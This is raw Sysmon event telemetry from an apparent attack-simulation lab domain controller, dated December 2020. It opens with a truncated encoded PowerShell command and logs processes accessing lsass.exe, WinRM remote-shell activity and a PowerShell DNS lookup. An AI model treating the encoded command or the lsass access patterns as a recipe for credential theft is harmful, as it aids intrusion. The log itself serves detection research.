FkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.139{10ACEC4A-8541-5FCF-1500-000000009101}13641444C:\Windows\system32\svchost.exe{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.139{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C100-000000009101}4604C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.126{10ACEC4A-8587-5FCF-C000-000000009101}4596C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.123{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.107{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.291{10ACEC4A-8584-5FCF-BD00-000000009101}1928onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 